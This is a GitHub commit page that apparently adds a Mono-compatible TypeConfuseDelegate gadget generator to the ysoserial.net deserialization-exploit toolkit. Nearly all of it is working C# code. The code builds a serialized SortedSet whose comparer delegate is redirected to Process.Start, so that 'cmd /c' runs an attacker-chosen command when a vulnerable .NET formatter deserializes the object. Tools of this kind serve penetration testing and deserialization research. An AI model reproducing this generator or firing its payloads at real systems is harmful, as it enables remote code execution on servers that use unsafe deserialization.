-
Notifications
You must be signed in to change notification settings - Fork 474
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #45 from denandz/typeconfusedelegate-mono-generator
Added Mono compatible TypeConfuseDelegate generator
- Loading branch information
Showing
3 changed files
with
78 additions
and
5 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,57 @@ | ||
using System; | ||
using System.Collections.Generic; | ||
using System.Diagnostics; | ||
using System.IO; | ||
using System.Reflection; | ||
|
||
namespace ysoserial.Generators | ||
{ | ||
class TypeConfuseDelegateMonoGenerator : GenericGenerator | ||
{ | ||
public override string Name() | ||
{ | ||
return "TypeConfuseDelegateMono"; | ||
} | ||
|
||
public override string Description() | ||
{ | ||
return "TypeConfuseDelegate gadget by James Forshaw - Tweaked to work with Mono"; | ||
} | ||
|
||
public override List<string> SupportedFormatters() | ||
{ | ||
return new List<string> { "BinaryFormatter", "ObjectStateFormatter", "NetDataContractSerializer", "LosFormatter" }; | ||
} | ||
|
||
public override object Generate(string cmd, string formatter, Boolean test) | ||
{ | ||
return Serialize(TypeConfuseDelegateGadget(cmd), formatter, test); | ||
} | ||
|
||
/* this can be used easily by the plugins as well */ | ||
public object TypeConfuseDelegateGadget(string cmd) | ||
{ | ||
if (File.Exists(cmd)) | ||
{ | ||
Console.Error.WriteLine("Reading command from file " + cmd + " ..."); | ||
cmd = File.ReadAllText(cmd); | ||
} | ||
Delegate da = new Comparison<string>(String.Compare); | ||
Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da); | ||
IComparer<string> comp = Comparer<string>.Create(d); | ||
SortedSet<string> set = new SortedSet<string>(comp); | ||
set.Add("cmd"); | ||
set.Add("/c " + cmd); | ||
|
||
FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance); | ||
object[] invoke_list = d.GetInvocationList(); | ||
// Modify the invocation list to add Process::Start(string, string) | ||
invoke_list[0] = new Func<string, string, Process>(Process.Start); | ||
invoke_list[1] = new Func<string, string, Process>(Process.Start); | ||
fi.SetValue(d, invoke_list); | ||
|
||
return set; | ||
} | ||
|
||
} | ||
} |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters